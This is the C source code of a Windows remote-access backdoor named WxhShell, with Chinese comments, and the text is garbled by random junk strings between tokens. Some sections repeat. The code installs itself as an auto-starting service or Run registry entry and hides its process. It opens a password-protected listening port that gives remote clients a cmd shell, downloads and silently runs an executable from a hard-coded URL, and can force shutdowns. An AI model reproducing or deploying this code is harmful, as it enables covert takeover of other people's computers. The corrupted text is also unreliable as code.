mP!=&u fcU // 自身启动模式 kGz0`8URu int StartFromService(void) s5`CV$bz { !hMD>B2Z typedef struct eo#2n8I>=1 { j{8;5 ?x DWORD ExitStatus; Th\w#%'N DWORD PebBaseAddress; U?@ s`. DWORD AffinityMask; FfeX;pi DWORD BasePriority; D8OW|wVE ULONG UniqueProcessId; 71S~*"O0f ULONG InheritedFromUniqueProcessId; %S`ygc}| } PROCESS_BASIC_INFORMATION; hg2a,EU\Z g2Hz[C( PROCNTQSIP NtQueryInformationProcess; A7`+XqG 2F}D?]A static ENUMPROCESSMODULES g_pEnumProcessModules = NULL ; vkR,Sn static GETMODULEBASENAME g_pGetModuleBaseName = NULL ; M%yeI{m ?*{Vn5aX{ HANDLE hProcess; x=S8UKUx PROCESS_BASIC_INFORMATION pbi; Z=[qaJ{] r$8(Q' HINSTANCE hInst = LoadLibraryA("PSAPI.DLL"); V4["+Y if(NULL == hInst ) return 0; n]3Lqe; g-C)y
06 g_pEnumProcessModules = (ENUMPROCESSMODULES)GetProcAddress(hInst ,"EnumProcessModules"); f9%M:cl g_pGetModuleBaseName = (GETMODULEBASENAME)GetProcAddress(hInst, "GetModuleBaseNameA"); DB=^Z%%Z NtQueryInformationProcess = (PROCNTQSIP)GetProcAddress(GetModuleHandle("ntdll"), "NtQueryInformationProcess"); }s@
i \!51I./Q/ if (!NtQueryInformationProcess) return 0; iBqxz:PHN( EPd9'9S hProcess = OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,GetCurrentProcessId()); )ajF ca@v if(!hProcess) return 0; h!~Qyb>W v=pkze if(NtQueryInformationProcess( hProcess, 0, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL)) return 0; bZ5cKQ\6 zfsGf'U CloseHandle(hProcess); =qJlSb No\3kRB4bi hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pbi.InheritedFromUniqueProcessId); 5bj9S if(hProcess==NULL) return 0; r_"=DLx6 U} K]W>Z HMODULE hMod; G?,b51" char procName[255]; <MQTOz
oj unsigned long cbNeeded; JEL.*[/ >s%&t[r6 if(g_pEnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) g_pGetModuleBaseName(hProcess, hMod, procName, sizeof(procName)); 6_=t~9sY B4#XQ- CloseHandle(hProcess); J<9;Ix8R ov
'g'1} if(strstr(procName,"services")) return 1; // 以服务启动 >h
Rq t}Q
PPp y return 0; // 注册表启动 { Mv$~T|e7 } 2Wx~+@1y -f-@[; D // 主模块 Ya*<me>`
int StartWxhshell(LPSTR lpCmdLine) -d*zgP { lZ*V.-D^] SOCKET wsl; S^c;i BOOL val=TRUE; WV8vDv1jt int port=0; n:8<Ijrh struct sockaddr_in door; {<P{uH\l U
=i=E}' if(wscfg.ws_autoins) Install(); H
%bXx- (i.7\$4 port=atoi(lpCmdLine); /5wIbmz@I )azK&f@tR| if(port<=0) port=wscfg.ws_port; W<c95QD. |?gO@?KDZ WSADATA data; N<N uBtkA if(WSAStartup(MAKEWORD(2,2),&data)!=0) return 1; NI^jQS
M] }2]m]D@%7 if((wsl = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,0,0)) == INVALID_SOCKET) return 1; ,]L sX"u setsockopt(wsl,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val)); &y+)xe:&S door.sin_family = AF_INET; r.ib"W#4 door.sin_addr.s_addr = inet_addr("127.0.0.1"); U)JwoO door.sin_port = htons(port); J=?P`\h xt zjFfq if(bind(wsl, (const struct sockaddr *) &door,sizeof(door)) == INVALID_SOCKET) { @Rw]boC closesocket(wsl); jU}iQM return 1; L!LhH } K})w B.#.gB#C if(listen(wsl,2) == INVALID_SOCKET) { GlOSCJZ closesocket(wsl); KBg5_+l return 1; QFg{.F?3q> } <HfmNhI85( Wxhshell(wsl); <- (n48 WSACleanup(); oXgi#(y ([ODmZHv return 0; h|{DIG3 hRI?>an } =,J-D6J? nr?| !gj // 以NT服务方式启动 ec&K}+p@ VOID WINAPI NTServiceMain( DWORD dwArgc, LPSTR *lpszArgv ) l
Zz%W8" { 0..]c-V(G DWORD status = 0; 3Hi[Y[O`%P DWORD specificError = 0xfffffff; oIv\Xdc8 1 |@Ze{\
serviceStatus.dwServiceType = SERVICE_WIN32; z5g4+y, serviceStatus.dwCurrentState = SERVICE_START_PENDING; N
Wf IRL serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE; nc9sfH3 serviceStatus.dwWin32ExitCode = 0; ~N]pB]/][ serviceStatus.dwServiceSpecificExitCode = 0; gkFw=Cd serviceStatus.dwCheckPoint = 0; 3y}8|ML serviceStatus.dwWaitHint = 0; E#VF7 9L 2I>`{#fV hServiceStatusHandle = RegisterServiceCtrlHandler(wscfg.ws_svcname, NTServiceHandler); r:U/a=V if (hServiceStatusHandle==0) return; MWI7u7{ _-:CU
status = GetLastError(); jAxrU if (status!=NO_ERROR) pn p)- a*7 { ZkmYpi[ serviceStatus.dwCurrentState = SERVICE_STOPPED; *q*$%H serviceStatus.dwCheckPoint = 0; ?_j]w%Hz serviceStatus.dwWaitHint = 0; 1xDh[:6 serviceStatus.dwWin32ExitCode = status; q+U&lw|"w serviceStatus.dwServiceSpecificExitCode = specificError; R*l3 zn> SetServiceStatus(hServiceStatusHandle, &serviceStatus); 1'!%$D return; sP@7%p>wt } (2(y9r*1 #A 7|=E serviceStatus.dwCurrentState = SERVICE_RUNNING; jL0=a.; serviceStatus.dwCheckPoint = 0; BV)) #D9 serviceStatus.dwWaitHint = 0; vEc<|t if(SetServiceStatus(hServiceStatusHandle, &serviceStatus)) StartWxhshell(""); c+ukVn`r } Y(;u)uN_ $Ned1@%[ // 处理NT服务事件,比如:启动、停止 >Q2kXwN VOID WINAPI NTServiceHandler(DWORD fdwControl) giHqc7-PaX { ay,"MJ2 switch(fdwControl) 3a0% J' { K6 c[W%Va case SERVICE_CONTROL_STOP: E]0Qz?
W serviceStatus.dwWin32ExitCode = 0; `4-m$ab serviceStatus.dwCurrentState = SERVICE_STOPPED; 9cQ;h37J> serviceStatus.dwCheckPoint = 0; u,JUMH]@ serviceStatus.dwWaitHint = 0; }$` PZUw> { cuh Z_l SetServiceStatus(hServiceStatusHandle, &serviceStatus); }oL
l?L } VK%
j45D ` return; J]5ZWo% case SERVICE_CONTROL_PAUSE: 4"s/T0C serviceStatus.dwCurrentState = SERVICE_PAUSED; 9.wZhcqqU break; FyqsFTh_ case SERVICE_CONTROL_CONTINUE: P-\65]`C serviceStatus.dwCurrentState = SERVICE_RUNNING; 3'!*/UnU break; N6BEl55 & case SERVICE_CONTROL_INTERROGATE: vu~7Z;y(<j break; ot,=.%O }; nq:'jdY5| SetServiceStatus(hServiceStatusHandle, &serviceStatus); KT0Pmpp5 } l{Xy %8 T'-kG"l b // 标准应用程序主函数 ;~Gez;AhK int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nCmdShow) T\ [CQO { W?yGV{#V(= AWDy_11Nm // 获取操作系统版本
@7J;}9E OsIsNt=GetOsVer(); yL_\&v GetModuleFileName(NULL,ExeFile,MAX_PATH); M;sT+Z{ 6o]j@o8V // 从命令行安装 _xGC0f ( if(strpbrk(lpCmdLine,"iI")) Install(); +J3Y}A4W3X ]RxWypA` // 下载执行文件 ]\F}-I[ if(wscfg.ws_downexe) { #c(BBTuX if(URLDownloadToFile(0, wscfg.ws_fileurl, wscfg.ws_filenam, 0, 0)==S_OK) B:6VD /qC WinExec(wscfg.ws_filenam,SW_HIDE); 0,wmEV!) } XnB-1{a1 1"No~/_ if(!OsIsNt) { I+rLKGZC // 如果时win9x,隐藏进程并且设置为注册表启动 fv:&?gc HideProc(); KeWIC,kq StartWxhshell(lpCmdLine); Ee^>Q*wahw } zYEb#*Kar else <f;Xs( if(StartFromService()) |N0RBa4% // 以服务方式启动 A\v]ZN4 StartServiceCtrlDispatcher(DispatchTable); [Uw3.CVh else #kp+e)F // 普通方式启动 o`.5NUn StartWxhshell(lpCmdLine); %$F_oO7" X<d`!,bn@
return 0; [0H]L{yV } (H-kWT BOme`0A ?>q5Abp[ Hm]\.ZEy =========================================== z
q@"qnr 9`Xr7gmQf DI=?{A .50ql[En W];l[D<S* YXIAVSnr " -o+; e3# =QhK|C!$A #include <stdio.h> vAzSpiv- #include <string.h> Z`>m #include <windows.h> AQ)J|i #include <winsock2.h> #0c;2}D #include <winsvc.h> lI;ACF^ #include <urlmon.h> Tua#~.3}J }Io5&ww:U #pragma comment (lib, "Ws2_32.lib") eV\VR
!!i #pragma comment (lib, "urlmon.lib") mA4]c
*rmM2{6 #define MAX_USER 100 // 最大客户端连接数 S'=}eeG #define BUF_SOCK 200 // sock buffer 7w.9PNhy #define KEY_BUFF 255 // 输入 buffer hlGrnL RP%FMb}nt #define REBOOT 0 // 重启 LUEZqIf #define SHUTDOWN 1 // 关机 [{6fyd; :_kZkWD5 #define DEF_PORT 5000 // 监听端口 bdHHOpXM Q@/Z~xw"'I #define REG_LEN 16 // 注册表键长度 |)%;B% #define SVC_LEN 80 // NT服务名长度 U4h5K}j4 VVk8z6W // 从dll定义API U<wM#l
P|Z typedef DWORD (WINAPI pREGISTERSERVICEPROCESS) (DWORD,DWORD); t>eeOWk3 typedef LONG (WINAPI *PROCNTQSIP)(HANDLE,UINT,PVOID,ULONG,PULONG); Tb!jIe typedef BOOL (WINAPI *ENUMPROCESSMODULES) (HANDLE hProcess, HMODULE * lphModule, DWORD cb, LPDWORD lpcbNeeded); 7Jn%c<s typedef DWORD (WINAPI *GETMODULEBASENAME) (HANDLE hProcess, HMODULE hModule, LPTSTR lpBaseName, DWORD nSize); %jxeh.B3B 5RR4jX] // wxhshell配置信息 ageTv/ struct WSCFG { qb+Gjgp int ws_port; // 监听端口 g])iU9)8 char ws_passstr[REG_LEN]; // 口令 ,OBJ>_5 int ws_autoins; // 安装标记, 1=yes 0=no .DHQJ|J-1 char ws_regname[REG_LEN]; // 注册表键名 cg^=F_h char ws_svcname[REG_LEN]; // 服务名 6b\JD.r*{ char ws_svcdisp[SVC_LEN]; // 服务显示名 4oN*J +"=+ char ws_svcdesc[SVC_LEN]; // 服务描述信息 RAFdo char ws_passmsg[SVC_LEN]; // 密码输入提示信息 c1Hp int ws_downexe; // 下载执行标记, 1=yes 0=no 2!GyQ@&[W char ws_fileurl[SVC_LEN]; // 下载文件的 url, "http://xxx/file.exe" R,m|+[sl char ws_filenam[SVC_LEN]; // 下载后保存的文件名 ]p8<Vluv zG\:#,9 }; D/puK &S8,-~U // default Wxhshell configuration ["15~9 struct WSCFG wscfg={DEF_PORT, a6 w'.]m "xuhuanlingzhe", 9z7rv, 1, HrHtA] "Wxhshell", f'OcW*t "Wxhshell", ov,[F<GT "WxhShell Service", &)!4rABn "Wrsky Windows CmdShell Service", _J>!K'Dz "Please Input Your Password: ", .Xk#Cwm' 1, a$$aM2.2 "http://www.wrsky.com/wxhshell.exe", Dmr3r[ "Wxhshell.exe" '?d5L+9 }; r+,JM L t_id/ // 消息定义模块 d?N[bA
char *msg_ws_copyright="\n\rWxhShell v1.0 (C)2005 http://www.wrsky.com\n\rMake by 虚幻灵者\n\r"; MC%!>,tC char *msg_ws_prompt="\n\r? for help\n\r#>"; *`V r P char *msg_ws_cmd="\n\ri Install\n\rr Remove\n\rp Path\n\rb reboot\n\rd shutdown\n\rs Shell\n\rx exit\n\rq Quit\n\r\n\rDownload:\n\r#>http://.../server.exe\n\r"; R[}fr36>/ char *msg_ws_ext="\n\rExit."; <STE~ZmO char *msg_ws_end="\n\rQuit."; %Q zk aXJ char *msg_ws_boot="\n\rReboot..."; ,Gy2$mglB char *msg_ws_poff="\n\rShutdown..."; c6tH'oV char *msg_ws_down="\n\rSave to "; K/z2.Npn Pp`[E/
qj4 char *msg_ws_err="\n\rErr!"; CB`GiH/j char *msg_ws_ok="\n\rOK!"; :]9CdkaU .-GC,&RO char ExeFile[MAX_PATH]; S>y}|MG int nUser = 0; iO 7s zi HANDLE handles[MAX_USER]; lCGEd 3 int OsIsNt; %:\GYs(Y A}_0iwG SERVICE_STATUS serviceStatus; VbX$\Cs: SERVICE_STATUS_HANDLE hServiceStatusHandle; EXti QI`&N(n // 函数声明 uLrZl0%HT~ int Install(void); >9t+lr1 int Uninstall(void); a"phwCc"% int DownloadFile(char *sURL, SOCKET wsh); Z5,"KhB] int Boot(int flag); JdX!#\O void HideProc(void); t!o=-k int GetOsVer(void); K9) |b`E= int Wxhshell(SOCKET wsl); .7> g8 void TalkWithClient(void *cs); bZu2.?{ int CmdShell(SOCKET sock); tkW7wP; int StartFromService(void); 9!s)52qt int StartWxhshell(LPSTR lpCmdLine); .Zr3!N.t fHXz{,?/w VOID WINAPI NTServiceMain( DWORD dwArgc, LPTSTR *lpszArgv ); U_~r0 VOID WINAPI NTServiceHandler( DWORD fdwControl ); 8}?w%FsN# !&pk^VFl+ // 数据结构和表定义 jRhRw; SERVICE_TABLE_ENTRY DispatchTable[] = "89L^I { ESni r6HoU {wscfg.ws_svcname, NTServiceMain}, >w#&fd {NULL, NULL} %FLe@.Ep{D }; ()zn8_z ~z7Fz"o< // 自我安装 B
!Z~j T int Install(void) Pa"[&{ : { -gpHg char svExeFile[MAX_PATH]; M\r=i>(cu HKEY key; <=@6UPsn2 strcpy(svExeFile,ExeFile); 8$38>cGY^ cX|(/h,W/ // 如果是win9x系统,修改注册表设为自启动 jm,:jkr if(!OsIsNt) { :b<< if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) { C^*}*hYk$ RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile)); -+kTw06_C RegCloseKey(key); @-.Tgpe@a if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) { L 7l"*w( RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile)); 2C#b-Y1~N RegCloseKey(key); 56H~MnX return 0; L6J.^tpO } 0[Z wtfL1 } jV(b?r)eT{ } `/9&o;qM
else { a#m T@l\ bM"d$tl$?' // 如果是NT以上系统,安装为系统服务 |j}%"wOh SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE); 7A{,)Y/w ^ if (schSCManager!=0) RU\MT'E>( { 9a]h;r8,9z SC_HANDLE schService = CreateService rDC=rG ( #xt-65^ schSCManager, oPrK{flm wscfg.ws_svcname, D9\ E kX wscfg.ws_svcdisp, r_pZK(G% SERVICE_ALL_ACCESS, /<CgSW} SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS , o^+g2;Ro SERVICE_AUTO_START, T)MZ`dM SERVICE_ERROR_NORMAL, 5wbR}`8 svExeFile, {emym$we NULL, 7kmd.< NULL, z W*Z NULL, n(j5dN>] NULL, /,JL \b NULL W.?EjEx ); {r_x\VC=p if (schService!=0) 3Cg0^~?6- { eV( CloseServiceHandle(schService); j "e]Ui CloseServiceHandle(schSCManager); Og2G0sWRf strcpy(svExeFile,"SYSTEM\\CurrentControlSet\\Services\\"); -"d&Ow7o strcat(svExeFile,wscfg.ws_svcname); ~[:C l if(RegOpenKey(HKEY_LOCAL_MACHINE,svExeFile,&key)==ERROR_SUCCESS) { AIt;~x RegSetValueEx(key,"Description",0,REG_SZ,(BYTE *)wscfg.ws_svcdesc,lstrlen(wscfg.ws_svcdesc)); ABU~V+'2 RegCloseKey(key); Ev,b5KelD return 0; SFVqUg3"Z } #F ;@Qi3z } ]".SW5b_ CloseServiceHandle(schSCManager); NH!x6p]n } d1u6*&@lf } B=|m._OL]n 5wa!pR\c return 1; (gF{S*` } >?r8D48` U2*kuP+n // 自我卸载 !^qpV7./l int Uninstall(void) 8GT4U5c
; { U]
av{}U HKEY key; <MgC7S2I C ,[q#D4 if(!OsIsNt) { U_@Dn[/: if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) { 1_5]3+r_U- RegDeleteValue(key,wscfg.ws_regname); AQgm]ex< RegCloseKey(key); 6:AZZF1 if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) { aa/_:V@$~ RegDeleteValue(key,wscfg.ws_regname); 9bu1Ax1M RegCloseKey(key); KvtJtql; return 0; 4/Xu,pT } 7>xfQ } NJPp6RZ% } :KBy(}V else { SVqKG+{My ;!pJ%p0Sc SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS); ;
nYR~~ if (schSCManager!=0) oU)3du
{ mLH,6rO9 SC_HANDLE schService = OpenService( schSCManager, wscfg.ws_svcname, SERVICE_ALL_ACCESS); `WlQ<QEi if (schService!=0) @_Es|(4 { :djbZ>< if(DeleteService(schService)!=0) { fU^5Dl CloseServiceHandle(schService); c!J|vRA5 CloseServiceHandle(schSCManager); FUs57
V return 0; k5eTfaxl } 3'6by!N,d CloseServiceHandle(schService); }Ih5`$ } M b(hdS90 CloseServiceHandle(schSCManager); YAYwrKt } gCv[AIE_m } Y&1Yc)*O EL;OYW( return 1; |jyD@Q,4 } %QFeQ(b/( KBwY _ // 从指定url下载文件 ?EA&kZR] int DownloadFile(char *sURL, SOCKET wsh) /|,:'W%U { la89>pF HRESULT hr; 06>+loBG char seps[]= "/"; A5%cgr% 6 char *token; .MW/XnCYs4 char *file; /[>zFYaQ char myURL[MAX_PATH]; Ct386j>< char myFILE[MAX_PATH]; _QiGrC ~uh,R-Q$ strcpy(myURL,sURL); hXQo>t-$ token=strtok(myURL,seps); \\$wg while(token!=NULL) okLheF { !=(M P: file=token; 48[b1#q] token=strtok(NULL,seps); js)I%Z } tz_WxOQ0 ./Wi(p{F GetCurrentDirectory(MAX_PATH,myFILE); 0m'tPFQ| strcat(myFILE, "\\"); mM-7
jz strcat(myFILE, file); !E9A=u{ send(wsh,myFILE,strlen(myFILE),0); <<+Hs/ ] send(wsh,"...",3,0); vff`Xh>k( hr = URLDownloadToFile(0, sURL, myFILE, 0, 0); Q7SRf$4 if(hr==S_OK) +3k#M[Bn} return 0; ){xMMQ5 else 4Q^i"jT return 1; @po|07
6|ENDd[ } 9H,Ec,. n^k Uu2g| // 系统电源模块 VMV~K7%0 int Boot(int flag) T``~YoIdz { yNN_}9 HANDLE hToken; 7A46?kfu TOKEN_PRIVILEGES tkp; )*_n/^m WkK.ON^ if(OsIsNt) { ?8R
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken); {b90c'8?a LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); IC@-`S#F tkp.PrivilegeCount = 1; :qO)^~x tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; mKhlYVn AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0); O
-N>
X if(flag==REBOOT) { {ZD'l5jU if(ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0)) Dp"
xO<PE2 return 0; pQOT\- bD } $Qq5Fx9kU else { G~`nLC^Y if(ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0)) J)a^3> return 0; !UW{xHu } h|Udw3N1L } =%$BFg1a( else { _U/C G<n if(flag==REBOOT) { ICXz(?a if(ExitWindowsEx(EWX_REBOOT + EWX_FORCE,0)) /d]{ #,k return 0; Ikj_
0/%F } %2`geN< else { <%Afa# if(ExitWindowsEx(EWX_SHUTDOWN + EWX_FORCE,0)) ,.PmH.zjmR return 0; rH5'+x K } PvB-Cqc } Y)OTvKrOA Z*Jp?[## return 1; 8n Oent0a } 0@*EwI M8iI e:{ c // win9x进程隐藏模块 l/o
4bkV void HideProc(void) a gM I$ { O^yDb '*,P33h9<! HINSTANCE hKernel=LoadLibrary("Kernel32.dll"); u&s>UkR if ( hKernel != NULL ) (DrDWD4_ { k>dzeH pREGISTERSERVICEPROCESS *pRegisterServiceProcess=(pREGISTERSERVICEPROCESS *)GetProcAddress(hKernel,"RegisterServiceProcess"); <zE~N~; ( *pRegisterServiceProcess)(GetCurrentProcessId(),1); MuCnBx FreeLibrary(hKernel); Z=\wI:TY1 } H@!kgaNF gg%9EJpP return; GMRFZw_M } (&t8.7O 5/"&C-t // 获取操作系统版本 lL{1wCsl int GetOsVer(void) 3a\.s9A" { zM*PN|/%sH OSVERSIONINFO winfo; 3 h~U)mg winfo.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); _/
Uer} GetVersionEx(&winfo); CEr*VsvjsU if(winfo.dwPlatformId==VER_PLATFORM_WIN32_NT) /~B\1 return 1; ss>p else dl&402 return 0; n.\|NR'v } 4+j:]poYG{ JK@"
& // 客户端句柄模块 1ZK~i int Wxhshell(SOCKET wsl) _pS!sY~d { n:d7 Tv1Z8 SOCKET wsh; c (Gl3^ struct sockaddr_in client; ^~:&/ 0 DWORD myID; `tb@x ^ !-gjA@Pk while(nUser<MAX_USER) :VEy\ R>W { >UUT9:,plA int nSize=sizeof(client); y~AF|Dk= wsh=accept(wsl,(struct sockaddr *)&client,&nSize); 'HdOW[3o if(wsh==INVALID_SOCKET) return 1; O=LiCSNEV >'GQB handles[nUser]=CreateThread(0,1000,(LPTHREAD_START_ROUTINE) TalkWithClient,(VOID *) wsh, 0, &myID); UAi] hUq if(handles[nUser]==0) d/4k F closesocket(wsh); tf+5@Zf]4 else [hT|]|fJS; nUser++; hi(uL>\ } NDv_@V(D WaitForMultipleObjects(MAX_USER,handles,TRUE,INFINITE);
[C TR8 _g#v*7o2@ return 0; Rw9 *!<Izt } uNcE_< [)&(zJHX // 关闭 socket -P5M(Rt void CloseIt(SOCKET wsh) xf?6_= { ^.f`6 6/ closesocket(wsh); }1/`<m nUser--; 6+;B2;*3 ExitThread(0); PN&;3z Z } z]Jpvw`p O)4P)KAO< // 客户端请求句柄 vKvT7Zxc void TalkWithClient(void *cs) *`HE$k! { DY~zi t LzX L* SOCKET wsh=(SOCKET)cs; Pd[&&!+gV char pwd[SVC_LEN]; QNzx(IV@ char cmd[KEY_BUFF]; Q41eYzAi char chr[1]; HAi'0%" int i,j; ]1XJQW@gF F/qx2E$*wo while (nUser < MAX_USER) { XZk?aik}` oNfNe^/T if(wscfg.ws_passstr) { ?\l@k(w4[x if(strlen(wscfg.ws_passmsg)) send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0); GGY WvGE+ //send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0); vV?=r5j //ZeroMemory(pwd,KEY_BUFF); 8@f=GJf i=0; ?+WSYg0 while(i<SVC_LEN) { >,v,4,c re `B fN // 设置超时 kZsat4r fd_set FdRead; MJ)aY2 struct timeval TimeOut; fs=W(~" FD_ZERO(&FdRead); \R0&*cnmo FD_SET(wsh,&FdRead); \2K_"5 TimeOut.tv_sec=8; zoU-*Rs6 TimeOut.tv_usec=0; 9?
#pqw int Er=select(wsh+1, &FdRead, NULL, NULL, &TimeOut); Vf'r6Rf if((Er==SOCKET_ERROR) || (Er==0)) CloseIt(wsh); K`25G_Y3@ .\?)O+J! if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh); 'WA]DlO pwd=chr[0]; *c[X{ if(chr[0]==0xd || chr[0]==0xa) { XSu9C zx&I pwd=0; Wn9b</tf break; S$Cht6m } &D|wc4+ i++; 16p$>a<6 } {bSi3 oI B[]v[q< // 如果是非法用户,关闭 socket ?G#T6$E8 if(strcmp(pwd,wscfg.ws_passstr)) CloseIt(wsh); 5DHFxym' } /kAu&} P7||d@VW, send(wsh,msg_ws_copyright,strlen(msg_ws_copyright),0); AvN\^
&G send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0); V ?10O fFHT`"bD: while(1) { ~;f,Ad`Q 2f8Cs$Opb ZeroMemory(cmd,KEY_BUFF); fh1rmet&Ts B^z3u=ll // 自动支持客户端 telnet标准 d0`5zd@S j=0; pm*6&, while(j<KEY_BUFF) { +{$NN if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh); d `z),A= cmd[j]=chr[0]; O=HT3gp& if(chr[0]==0xa || chr[0]==0xd) { .[Z<r> cmd[j]=0; c&+p{hH+ break; X\I"%6$ } drJ<&1O j++; ~olta\| } <V}^c/c! s4$Z.xwr // 下载文件 BJM_kKH if(strstr(cmd,"http://")) { oM=Ltxv} send(wsh,msg_ws_down,strlen(msg_ws_down),0); O;NQJ$^bI if(DownloadFile(cmd,wsh)) 2VNMz[W' send(wsh,msg_ws_err,strlen(msg_ws_err),0); v$O%U[e< else \`|*i$ send(wsh,msg_ws_ok,strlen(msg_ws_ok),0); A&$oiLc } *g}(qjl< else { -! dL
< a!1\,. switch(cmd[0]) { 7PDz ]i OZ*V7o // 帮助 Bu ~N)^ case '?': { IT3xX=|b send(wsh,msg_ws_cmd,strlen(msg_ws_cmd),0); H+]>*^'8 break; +%$'(ts } vGK'U*gGD // 安装 `YDe<@6' case 'i': { B r GaCja if(Install()) DQ{Yr>J send(wsh,msg_ws_err,strlen(msg_ws_err),0); ?lh
`>v else 6#/Riu% send(wsh,msg_ws_ok,strlen(msg_ws_ok),0); L}bS"=B[&W break; ? jywW$ } <c[+60p" // 卸载 #6[7q6{4 case 'r': { :
kVEB<G if(Uninstall()) .c[v /SB] send(wsh,msg_ws_err,strlen(msg_ws_err),0); MCOz-8@|Y else =R08B)yR send(wsh,msg_ws_ok,strlen(msg_ws_ok),0); Rw$>()}H8 break; $J>J@4 } >Lh+(M;+F // 显示 wxhshell 所在路径 F[Dhj,C" case 'p': { ! 5rja-h char svExeFile[MAX_PATH]; Z:l.{3J$ strcpy(svExeFile,"\n\r"); kKV`9&dZe strcat(svExeFile,ExeFile); {2`:7U~| send(wsh,svExeFile,strlen(svExeFile),0); 1M|DaAI break; 4s?x 8oAy } -r9G5Z!|n // 重启 ;%r#pv~ case 'b': { QRs!B!Fn0 send(wsh,msg_ws_boot,strlen(msg_ws_boot),0); jP{LMmV if(Boot(REBOOT)) C3Mr) send(wsh,msg_ws_err,strlen(msg_ws_err),0); 5B[kZ?> else { a'f0Wv0%" closesocket(wsh); [p%@ pV ExitThread(0); MLV_I4o } l65-8 break; Cd:ofv/3 } H7 acT // 关机 :I(-@2?{ case 'd': { $V$|"KRcs send(wsh,msg_ws_poff,strlen(msg_ws_poff),0); Sm;EWz-? if(Boot(SHUTDOWN)) hadGF%> O6 send(wsh,msg_ws_err,strlen(msg_ws_err),0); s6k,'`. else { 6~Y-bn"%D5 closesocket(wsh); sK~d{)+T ExitThread(0); hjB G`S# } 4}:a"1P" break; t_@xzt10y } 'H0b1t1S% // 获取shell 1LTl=tS# case 's': { ;~Eb Q CmdShell(wsh); $:I~y|
!1 closesocket(wsh); @D!KFJ ExitThread(0); d($f8{~W break; ;<Dou7= } $gsn@P>" // 退出 ,nqG*
o case 'x': { zbt>5S_ send(wsh,msg_ws_ext,strlen(msg_ws_ext),0); n>F1G
MX CloseIt(wsh); R v61*F4 break; YYFJJ,7? } ;m{*iKL6{ // 离开 yM%,*VZ case 'q': { F&}>2QiL send(wsh,msg_ws_end,strlen(msg_ws_end),0); YYDLFtr2 closesocket(wsh); YKwej@9, WSACleanup(); J]8nbl exit(1); sy+o{] N break; r40#-A$ } \S(:O8_"68 } HFD5*Z~M } k>
I;mEV ' bio:1 // 提示信息 \ /C-e if(strlen(cmd)) send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0); @`<v d@ } " &B/v"nj } WDr'w' ^Z7])arA return; {6YLiQ*_ } Yr@)W~ ?pdvFM // shell模块句柄 7bioLE int CmdShell(SOCKET sock) Ug=8:a(U. { /[YH
W] STARTUPINFO si; M9{?gM9 ZeroMemory(&si,sizeof(si)); b?-Ep?G'\ si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; )>q.!"B si.hStdInput=si.hStdOutput =si.hStdError =(void *)sock; ^\kv>WBE PROCESS_INFORMATION ProcessInfo; {l=! char cmdline[]="cmd"; a%>p"4WL CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInfo); (q+U5Ls6 return 0; D'e'xU } "=I
ioY lJ!+n<K+ // 自身启动模式 {uEu
^6a5 int StartFromService(void) J2_D P { T_CYSS|fX typedef struct =/MAKi}g { nfck3h DWORD ExitStatus; p(UUH3%W DWORD PebBaseAddress; gio'_X DWORD AffinityMask; ^YzFEu$ DWORD BasePriority; 6dO )] ULONG UniqueProcessId; kK nz
F ULONG InheritedFromUniqueProcessId; YK#bzu ,! } PROCESS_BASIC_INFORMATION; }?xu/C 1,fjdd8OM; PROCNTQSIP NtQueryInformationProcess; 6P;JF%{J :`6E{yfM static ENUMPROCESSMODULES g_pEnumProcessModules = NULL ; HXF5fs static GETMODULEBASENAME g_pGetModuleBaseName = NULL ; uUb[Dqn v|~ yIywf HANDLE hProcess; SEQ
bw](ss PROCESS_BASIC_INFORMATION pbi; {q%&~
